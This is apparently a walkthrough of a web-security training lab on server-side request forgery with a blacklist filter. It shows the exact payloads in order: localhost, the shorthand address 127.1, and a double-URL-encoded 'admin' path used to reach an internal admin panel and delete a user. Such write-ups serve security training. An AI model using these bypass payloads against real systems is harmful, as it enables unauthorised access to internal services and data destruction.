Skip to main content

SSRF with blacklist-based input filter

1

Let's check out the stock.

2

We can intercept the request using Burpsuite.

3

Let's send the request to the Repeater.

We can set the stockApi field to the following and send the request:

http://localhost/admin

4

So that request is blocked.

Let's send the following request:

http://127.1/

6

Ah! That returns a valid response.

Let's try visiting the /admin page.

http://127.1/admin

7

Looks like the admin keyword is being pattern-matched and blocked.

We can get around it by double URL encoding the string.

10

Let's now send the following request:

http://127.1/%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65

9

We can now delete the carlos user.

http://127.1/%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65/delete?username=carlos

11

We have solved the lab.

12